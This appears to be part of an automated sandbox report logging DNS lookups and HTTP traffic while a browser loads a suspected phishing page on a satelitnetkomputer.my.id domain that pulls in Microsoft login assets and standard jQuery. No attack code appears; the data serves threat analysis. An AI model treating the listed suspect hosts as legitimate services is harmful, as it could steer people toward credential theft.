                                                                                                                                                    Jan 8, 2025 09:53:50.554462910 CET1.1.1.1192.168.2.40x1692No error (0)officehub.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:50.555481911 CET1.1.1.1192.168.2.40xa755No error (0)officehub.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:57.094722986 CET1.1.1.1192.168.2.40xd2a9No error (0)outlook.office.comsubstrate.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:57.094722986 CET1.1.1.1192.168.2.40xd2a9No error (0)substrate.office.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:57.094722986 CET1.1.1.1192.168.2.40xd2a9No error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:57.094722986 CET1.1.1.1192.168.2.40xd2a9No error (0)ooc-g2.tm-4.office.com40.99.150.82A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:57.094722986 CET1.1.1.1192.168.2.40xd2a9No error (0)ooc-g2.tm-4.office.com52.98.179.50A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:57.094722986 CET1.1.1.1192.168.2.40xd2a9No error (0)ooc-g2.tm-4.office.com40.99.150.34A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:57.094722986 CET1.1.1.1192.168.2.40xd2a9No error (0)ooc-g2.tm-4.office.com52.98.171.242A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:57.094722986 CET1.1.1.1192.168.2.40xd2a9No error (0)ooc-g2.tm-4.office.com52.98.179.66A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:57.094722986 CET1.1.1.1192.168.2.40xd2a9No error (0)ooc-g2.tm-4.office.com52.98.243.34A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:57.094722986 CET1.1.1.1192.168.2.40xd2a9No error (0)ooc-g2.tm-4.office.com40.99.150.98A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:57.094722986 CET1.1.1.1192.168.2.40xd2a9No error (0)ooc-g2.tm-4.office.com52.98.241.194A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:57.094743967 CET1.1.1.1192.168.2.40x6001No error (0)outlook.office.comsubstrate.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:57.094743967 CET1.1.1.1192.168.2.40x6001No error (0)substrate.office.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:53:57.094743967 CET1.1.1.1192.168.2.40x6001No error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:55:50.582232952 CET1.1.1.1192.168.2.40xdc3No error (0)officehub.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 8, 2025 09:55:50.582484007 CET1.1.1.1192.168.2.40x9fcbNo error (0)officehub.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    • https:
                                                                                                                                                      • code.jquery.com
                                                                                                                                                      • maxcdn.bootstrapcdn.com
                                                                                                                                                      • cdnjs.cloudflare.com
                                                                                                                                                      • aadcdn.msftauth.net
                                                                                                                                                      • bummings.chiliesdigital.co.za
                                                                                                                                                      • outlook.office.com
                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.2.449746151.101.66.1374433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:03 UTC558OUTGET /jquery-3.1.1.min.js HTTP/1.1
                                                                                                                                                    Host: code.jquery.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                    Referer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:03 UTC613INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 86709
                                                                                                                                                    Server: nginx
                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                    ETag: "28feccc0-152b5"
                                                                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:03 GMT
                                                                                                                                                    Age: 2505996
                                                                                                                                                    X-Served-By: cache-lga21947-LGA, cache-ewr-kewr1740030-EWR
                                                                                                                                                    X-Cache: HIT, HIT
                                                                                                                                                    X-Cache-Hits: 4188, 4
                                                                                                                                                    X-Timer: S1736326384.863736,VS0,VE0
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    2025-01-08 08:53:03 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77
                                                                                                                                                    Data Ascii: /*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
                                                                                                                                                    2025-01-08 08:53:03 UTC16384INData Raw: 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 74 26 26 28 73 26 26 28 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6b 5b 61 5d 3d 5b 77 2c 74 5d 29 2c 6d 3d 3d 3d 62 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 74 2d 3d 65 2c 74 3d 3d 3d 64 7c 7c 74 25 64 3d 3d 3d 30 26 26 74 2f 64 3e 3d 30 7d 7d 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 65 3d 64 2e 70 73 65 75 64 6f 73 5b 61 5d 7c 7c 64 2e 73 65 74 46 69 6c 74 65 72 73 5b 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74
                                                                                                                                                    Data Ascii: ===m.nodeType)&&++t&&(s&&(l=m[u]||(m[u]={}),k=l[m.uniqueID]||(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d||t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||ga.error("unsupported pseudo: "+a);ret
                                                                                                                                                    2025-01-08 08:53:04 UTC16384INData Raw: 64 3d 31 2c 55 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 62 7c 7c 28 62 3d 7b 7d 2c 54 28 61 29 26 26 28 61 2e 6e 6f 64 65 54 79 70 65 3f 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 62 3a 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a 62 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 29 29 2c 62 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 3d 74 68 69 73 2e 63 61 63 68 65 28 61 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 29 65 5b 72 2e 63 61 6d 65 6c 43 61 73 65
                                                                                                                                                    Data Ascii: d=1,U.prototype={cache:function(a){var b=a[this.expando];return b||(b={},T(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[r.camelCase
                                                                                                                                                    2025-01-08 08:53:04 UTC16384INData Raw: 65 26 26 39 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 61 29 7d 29 7d 2c 6e 75 6c 6c 2c 61 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 62 3d 44 61 28 74 68 69 73 2c 61 29 3b 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28
                                                                                                                                                    Data Ascii: e&&9!==this.nodeType||(this.textContent=a)})},null,a,arguments.length)},append:function(){return Ia(this,arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=Da(this,a);b.appendChild(a)}})},prepend:function(){return Ia(
                                                                                                                                                    2025-01-08 08:53:04 UTC16384INData Raw: 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 62 26 26 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 7d 7d 29 2c 72 2e 65 61 63 68 28 5b 22 74 61 62 49 6e 64 65 78 22 2c 22 72 65 61 64 4f 6e 6c 79 22 2c 22 6d 61 78 4c 65 6e 67 74 68 22 2c 22 63 65 6c 6c 53 70 61 63
                                                                                                                                                    Data Ascii: s.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),r.each(["tabIndex","readOnly","maxLength","cellSpac
                                                                                                                                                    2025-01-08 08:53:04 UTC4789INData Raw: 3d 62 2e 6a 73 6f 6e 70 21 3d 3d 21 31 26 26 28 52 62 2e 74 65 73 74 28 62 2e 75 72 6c 29 3f 22 75 72 6c 22 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 2e 64 61 74 61 26 26 30 3d 3d 3d 28 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 26 26 52 62 2e 74 65 73 74 28 62 2e 64 61 74 61 29 26 26 22 64 61 74 61 22 29 3b 69 66 28 68 7c 7c 22 6a 73 6f 6e 70 22 3d 3d 3d 62 2e 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 65 3d 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62
                                                                                                                                                    Data Ascii: =b.jsonp!==!1&&(Rb.test(b.url)?"url":"string"==typeof b.data&&0===(b.contentType||"").indexOf("application/x-www-form-urlencoded")&&Rb.test(b.data)&&"data");if(h||"jsonp"===b.dataTypes[0])return e=b.jsonpCallback=r.isFunction(b.jsonpCallback)?b.jsonpCallb


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    1192.168.2.449748151.101.66.1374433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:03 UTC609OUTGET /jquery-3.3.1.js HTTP/1.1
                                                                                                                                                    Host: code.jquery.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    Origin: https://vnondb0nbw.satelitnetkomputer.my.id:8443
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                    Referer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:03 UTC613INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 271751
                                                                                                                                                    Server: nginx
                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                    ETag: "28feccc0-42587"
                                                                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Age: 1882048
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:03 GMT
                                                                                                                                                    X-Served-By: cache-lga21980-LGA, cache-ewr-kewr1740067-EWR
                                                                                                                                                    X-Cache: HIT, HIT
                                                                                                                                                    X-Cache-Hits: 458, 0
                                                                                                                                                    X-Timer: S1736326384.863720,VS0,VE1
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 33 2e 33 2e 31 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 31 38 2d 30 31 2d 32 30 54 31 37
                                                                                                                                                    Data Ascii: /*! * jQuery JavaScript Library v3.3.1 * https://jquery.com/ * * Includes Sizzle.js * https://sizzlejs.com/ * * Copyright JS Foundation and other contributors * Released under the MIT license * https://jquery.org/license * * Date: 2018-01-20T17
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 2e 20 42 75 74 20 61 73 20 6f 66 20 6a 51 75 65 72 79 20 33 2e 30 20 28 32 30 31 36 29 2c 20 73 74 72 69 63 74 20 6d 6f 64 65 20 73 68 6f 75 6c 64 20 62 65 20 63 6f 6d 6d 6f 6e 0a 2f 2f 20 65 6e 6f 75 67 68 20 74 68 61 74 20 61 6c 6c 20 73 75 63 68 20 61 74 74 65 6d 70 74 73 20 61 72 65 20 67 75 61 72 64 65 64 20 69 6e 20 61 20 74 72 79 20 62 6c 6f 63 6b 2e 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 76 61 72 20 61 72 72 20 3d 20 5b 5d 3b 0a 0a 76 61 72 20 64 6f 63 75 6d 65 6e 74 20 3d 20 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 0a 0a 76 61 72 20 67 65 74 50 72 6f 74 6f 20 3d 20 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 0a 0a 76 61 72 20 73 6c 69 63 65 20 3d 20 61 72 72 2e 73 6c 69 63 65 3b 0a 0a 76 61 72 20 63 6f 6e 63
                                                                                                                                                    Data Ascii: . But as of jQuery 3.0 (2016), strict mode should be common// enough that all such attempts are guarded in a try block."use strict";var arr = [];var document = window.document;var getProto = Object.getPrototypeOf;var slice = arr.slice;var conc
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 63 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 20 73 63 72 69 70 74 20 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 20 73 63 72 69 70 74 20 29 3b 0a 09 7d 0a 0a 0a 66 75 6e 63 74 69 6f 6e 20 74 6f 54 79 70 65 28 20 6f 62 6a 20 29 20 7b 0a 09 69 66 20 28 20 6f 62 6a 20 3d 3d 20 6e 75 6c 6c 20 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 6f 62 6a 20 2b 20 22 22 3b 0a 09 7d 0a 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 41 6e 64 72 6f 69 64 20 3c 3d 32 2e 33 20 6f 6e 6c 79 20 28 66 75 6e 63 74 69 6f 6e 69 73 68 20 52 65 67 45 78 70 29 0a 09 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 6f 62 6a 20 3d 3d 3d 20 22 6f 62 6a 65 63 74 22 20 7c 7c 20 74 79 70 65 6f 66 20 6f 62 6a 20 3d 3d 3d 20 22 66 75 6e 63 74 69 6f 6e 22 20 3f 0a 09
                                                                                                                                                    Data Ascii: c.head.appendChild( script ).parentNode.removeChild( script );}function toType( obj ) {if ( obj == null ) {return obj + "";}// Support: Android <=2.3 only (functionish RegExp)return typeof obj === "object" || typeof obj === "function" ?
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 7b 0a 09 09 09 72 65 74 75 72 6e 20 73 6c 69 63 65 2e 63 61 6c 6c 28 20 74 68 69 73 20 29 3b 0a 09 09 7d 0a 0a 09 09 2f 2f 20 52 65 74 75 72 6e 20 6a 75 73 74 20 74 68 65 20 6f 6e 65 20 65 6c 65 6d 65 6e 74 20 66 72 6f 6d 20 74 68 65 20 73 65 74 0a 09 09 72 65 74 75 72 6e 20 6e 75 6d 20 3c 20 30 20 3f 20 74 68 69 73 5b 20 6e 75 6d 20 2b 20 74 68 69 73 2e 6c 65 6e 67 74 68 20 5d 20 3a 20 74 68 69 73 5b 20 6e 75 6d 20 5d 3b 0a 09 7d 2c 0a 0a 09 2f 2f 20 54 61 6b 65 20 61 6e 20 61 72 72 61 79 20 6f 66 20 65 6c 65 6d 65 6e 74 73 20 61 6e 64 20 70 75 73 68 20 69 74 20 6f 6e 74 6f 20 74 68 65 20 73 74 61 63 6b 0a 09 2f 2f 20 28 72 65 74 75 72 6e 69 6e 67 20 74 68 65 20 6e 65 77 20 6d 61 74 63 68 65 64 20 65 6c 65 6d 65 6e 74 20 73 65 74 29 0a 09 70 75 73 68 53
                                                                                                                                                    Data Ascii: {return slice.call( this );}// Return just the one element from the setreturn num < 0 ? this[ num + this.length ] : this[ num ];},// Take an array of elements and push it onto the stack// (returning the new matched element set)pushS
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 65 72 79 2e 66 6e 2e 65 78 74 65 6e 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 76 61 72 20 6f 70 74 69 6f 6e 73 2c 20 6e 61 6d 65 2c 20 73 72 63 2c 20 63 6f 70 79 2c 20 63 6f 70 79 49 73 41 72 72 61 79 2c 20 63 6c 6f 6e 65 2c 0a 09 09 74 61 72 67 65 74 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 20 30 20 5d 20 7c 7c 20 7b 7d 2c 0a 09 09 69 20 3d 20 31 2c 0a 09 09 6c 65 6e 67 74 68 20 3d 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 0a 09 09 64 65 65 70 20 3d 20 66 61 6c 73 65 3b 0a 0a 09 2f 2f 20 48 61 6e 64 6c 65 20 61 20 64 65 65 70 20 63 6f 70 79 20 73 69 74 75 61 74 69 6f 6e 0a 09 69 66 20 28 20 74 79 70 65 6f 66 20 74 61 72 67 65 74 20 3d 3d 3d 20 22 62 6f 6f 6c 65 61 6e 22 20 29 20 7b 0a 09 09 64 65 65 70 20 3d 20 74 61 72 67 65 74 3b
                                                                                                                                                    Data Ascii: ery.fn.extend = function() {var options, name, src, copy, copyIsArray, clone,target = arguments[ 0 ] || {},i = 1,length = arguments.length,deep = false;// Handle a deep copy situationif ( typeof target === "boolean" ) {deep = target;
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 65 2c 20 63 6f 70 79 20 29 3b 0a 0a 09 09 09 09 2f 2f 20 44 6f 6e 27 74 20 62 72 69 6e 67 20 69 6e 20 75 6e 64 65 66 69 6e 65 64 20 76 61 6c 75 65 73 0a 09 09 09 09 7d 20 65 6c 73 65 20 69 66 20 28 20 63 6f 70 79 20 21 3d 3d 20 75 6e 64 65 66 69 6e 65 64 20 29 20 7b 0a 09 09 09 09 09 74 61 72 67 65 74 5b 20 6e 61 6d 65 20 5d 20 3d 20 63 6f 70 79 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 0a 09 7d 0a 0a 09 2f 2f 20 52 65 74 75 72 6e 20 74 68 65 20 6d 6f 64 69 66 69 65 64 20 6f 62 6a 65 63 74 0a 09 72 65 74 75 72 6e 20 74 61 72 67 65 74 3b 0a 7d 3b 0a 0a 6a 51 75 65 72 79 2e 65 78 74 65 6e 64 28 20 7b 0a 0a 09 2f 2f 20 55 6e 69 71 75 65 20 66 6f 72 20 65 61 63 68 20 63 6f 70 79 20 6f 66 20 6a 51 75 65 72 79 20 6f 6e 20 74 68 65 20 70 61 67 65 0a 09 65
                                                                                                                                                    Data Ascii: e, copy );// Don't bring in undefined values} else if ( copy !== undefined ) {target[ name ] = copy;}}}}// Return the modified objectreturn target;};jQuery.extend( {// Unique for each copy of jQuery on the pagee
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 09 09 44 4f 4d 45 76 61 6c 28 20 63 6f 64 65 20 29 3b 0a 09 7d 2c 0a 0a 09 65 61 63 68 3a 20 66 75 6e 63 74 69 6f 6e 28 20 6f 62 6a 2c 20 63 61 6c 6c 62 61 63 6b 20 29 20 7b 0a 09 09 76 61 72 20 6c 65 6e 67 74 68 2c 20 69 20 3d 20 30 3b 0a 0a 09 09 69 66 20 28 20 69 73 41 72 72 61 79 4c 69 6b 65 28 20 6f 62 6a 20 29 20 29 20 7b 0a 09 09 09 6c 65 6e 67 74 68 20 3d 20 6f 62 6a 2e 6c 65 6e 67 74 68 3b 0a 09 09 09 66 6f 72 20 28 20 3b 20 69 20 3c 20 6c 65 6e 67 74 68 3b 20 69 2b 2b 20 29 20 7b 0a 09 09 09 09 69 66 20 28 20 63 61 6c 6c 62 61 63 6b 2e 63 61 6c 6c 28 20 6f 62 6a 5b 20 69 20 5d 2c 20 69 2c 20 6f 62 6a 5b 20 69 20 5d 20 29 20 3d 3d 3d 20 66 61 6c 73 65 20 29 20 7b 0a 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 20
                                                                                                                                                    Data Ascii: DOMEval( code );},each: function( obj, callback ) {var length, i = 0;if ( isArrayLike( obj ) ) {length = obj.length;for ( ; i < length; i++ ) {if ( callback.call( obj[ i ], i, obj[ i ] ) === false ) {break;}}}
                                                                                                                                                    2025-01-08 08:53:03 UTC1378INData Raw: 62 61 63 6b 45 78 70 65 63 74 20 3d 20 21 69 6e 76 65 72 74 3b 0a 0a 09 09 2f 2f 20 47 6f 20 74 68 72 6f 75 67 68 20 74 68 65 20 61 72 72 61 79 2c 20 6f 6e 6c 79 20 73 61 76 69 6e 67 20 74 68 65 20 69 74 65 6d 73 0a 09 09 2f 2f 20 74 68 61 74 20 70 61 73 73 20 74 68 65 20 76 61 6c 69 64 61 74 6f 72 20 66 75 6e 63 74 69 6f 6e 0a 09 09 66 6f 72 20 28 20 3b 20 69 20 3c 20 6c 65 6e 67 74 68 3b 20 69 2b 2b 20 29 20 7b 0a 09 09 09 63 61 6c 6c 62 61 63 6b 49 6e 76 65 72 73 65 20 3d 20 21 63 61 6c 6c 62 61 63 6b 28 20 65 6c 65 6d 73 5b 20 69 20 5d 2c 20 69 20 29 3b 0a 09 09 09 69 66 20 28 20 63 61 6c 6c 62 61 63 6b 49 6e 76 65 72 73 65 20 21 3d 3d 20 63 61 6c 6c 62 61 63 6b 45 78 70 65 63 74 20 29 20 7b 0a 09 09 09 09 6d 61 74 63 68 65 73 2e 70 75 73 68 28 20 65
                                                                                                                                                    Data Ascii: backExpect = !invert;// Go through the array, only saving the items// that pass the validator functionfor ( ; i < length; i++ ) {callbackInverse = !callback( elems[ i ], i );if ( callbackInverse !== callbackExpect ) {matches.push( e
